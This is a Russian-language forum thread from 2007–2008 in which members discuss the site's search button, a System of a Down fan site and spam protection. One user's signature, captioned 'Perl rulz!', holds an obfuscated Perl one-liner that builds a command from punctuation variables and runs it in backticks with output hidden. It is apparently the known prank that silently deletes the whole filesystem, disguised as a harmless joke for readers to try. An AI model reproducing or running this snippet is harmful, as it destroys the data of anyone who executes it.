Добавлено: Ср Ноя 07, 2007 10:01 am Заголовок сообщения:
когда чтото ищешь, там кнопка поиска потом два раза подряд, или убери или сделай чтоб как в гугле под результатами была вторая _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Ср Ноя 07, 2007 10:27 am Заголовок сообщения:
ALuserX
Вторая к расширенному поиску привязана, так что пока думаю как ее впихнуть в основной код _________________ Fortuna non penis in manus non recipe
Я конечно не прав и просто мимо шел, но уважаемый хозяин форума, почему вы не используете материалы с сайта http://www.soadomized.com/ ?
Оф коз, новость про то, что , к примеру, Шаво побывал на Грэмми, вроде и не важная, но для таких фэнов как я, мне кажется, тоже интересная..
С респектом и уважухой. _________________ Что там, за ветхой занавеской Тьмы?
В гаданиях запутались умы.
Когда же с треском рухнет занавеска,
Увидим все, как ошибались мы.
(С) Омар Хайям
Добавлено: Вт Фев 19, 2008 1:05 am Заголовок сообщения:
Аркадий
Типа не воруем.хз. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вт Фев 19, 2008 1:18 am Заголовок сообщения:
soadomized.По названию кажется,что на сайте что-то,связанное с БДСМ. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Сб Мар 15, 2008 11:53 pm Заголовок сообщения:
genj
это защита от идиотов (и спама заодно) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Сб Мар 15, 2008 11:54 pm Заголовок сообщения:
вообще в принципе, идиоту будет понятно что там делать надо? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!